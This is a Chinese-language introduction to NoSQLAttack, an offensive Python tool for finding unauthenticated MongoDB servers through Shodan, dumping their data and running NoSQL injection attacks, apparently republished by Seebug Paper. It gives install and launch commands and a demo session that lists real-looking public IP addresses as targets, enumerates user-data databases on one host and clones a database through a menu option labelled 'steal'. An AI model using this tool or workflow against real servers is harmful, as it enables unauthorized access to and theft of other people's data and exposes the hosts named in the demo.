項目地址:https://github.com/youngyangyang04/NoSQLAttack

項目作者:youngyangyang04

介紹

NoSQLAttack 是一個用python編寫的開源的攻擊工具,用來暴露網絡中默認配置mongoDB的IP并且下載目標mongoDB的數據,同時還可以針對以mongoDB為后臺存儲的應用進行注入攻擊,使用這個工具就可以發現有成千上萬的mongoDB裸奔在互聯網上,并且數據可以隨意下載。

這個攻擊工具是基于tcstool的NoSQLMap和搜索引擎shodan

一些攻擊的數據是來自于以下論文給予的啟發

NoSQL注入攻擊測試系統NoSQLInjectionAttackDemo,這里面有兩個系統用來測試注入攻擊。

背景介紹

在NoSQL注入攻擊中有PHP數組注入,js注入和mongo shell拼接注入等多種方法可以攻擊mongoDB,并且現在有成千上萬的mongoDB暴露在互聯網上,只要知道目標mongoDB的ip和端口號就可以把裸露的mongoDB中的數據都下載下來。

運行環境

項目運行在linux系統上,NoSQLAttack的依賴包已經寫在setup.py文件里,并且已經在Ubuntu 和MAC OS X上都測試了,只需要執行這個腳本就可以自動配置好安裝環境 開發這個項目使用時使用的是Pycharm COMMUNITY 2016.1,python的版本為2.7.10,使用者需要在本地電腦安裝mongoDB

安裝

在linux系統下可以直接將下載的項目解壓,然后執行以下兩個命令

cd NoSQLAttack
python setup.py install

使用方法

安裝完畢后,執行一下命令就可以啟動該項目

NoSQLAttack

啟動該項目后將會展現如下的界面,然后就可以開啟黑客之旅了

================================================
NoSQL Attack 
================================================    
NoSQLAttack-v0.2
sunxiuyang04@gmail.com


1-Scan attacked IP
2-Configurate parameters
3-MongoDB Access Attacks
4-Injection Attacks
x-Exit

系統演示

===============================================
NoSQL Attack   
================================================     
NoSQLAttack-v0.2
sunxiuyang04@gmail.com


1-Scan attacked IP
2-Configurate parameters
3-MongoDB Access Attacks
4-Injection Attacks
x-Exit
Select an option:1
Start Scanning.....
Results found:28793
1_Attacked IP : 149.202.88.135
2_Attacked IP : 49.212.186.80
3_Attacked IP : 85.9.62.231
4_Attacked IP : 121.78.239.11
5_Attacked IP : 54.226.207.112
6_Attacked IP : 119.254.66.44
7_Attacked IP : 121.46.0.83
8_Attacked IP : 162.243.21.180
9_Attacked IP : 210.23.29.75
Select IP to attack:2
Start Default Configuration Attack(y/n)?y
DB access attacks(mongoDB)
=========================
Checking to see if crendentials are need
49.212.186.80

27017
Successful access with no credentials!


1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Clone a Database
4-Return to Main Menu
Select an attack: 2
List of databases:
MultiCopyService_UserData
SmartNFC_UserData
SmartShop_UserData
KioskPointMng2_UserData
admin
db
local

1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Clone a Database
4-Return to Main Menu
Select an attack: 3


(1)MultiCopyService_UserData
(2)SmartNFC_UserData
(3)SmartShop_UserData
(4)KioskPointMng2_UserData
(5)admin
(6)db
(7)dbItem
(8)local

Select a database to steal:6
Does this Database require credentials.(y/n)?n
Database cloned. Copy another (y/n)?

Paper 本文由 Seebug Paper 發布,如需轉載請注明來源。本文地址:http://www.bjnorthway.com/110/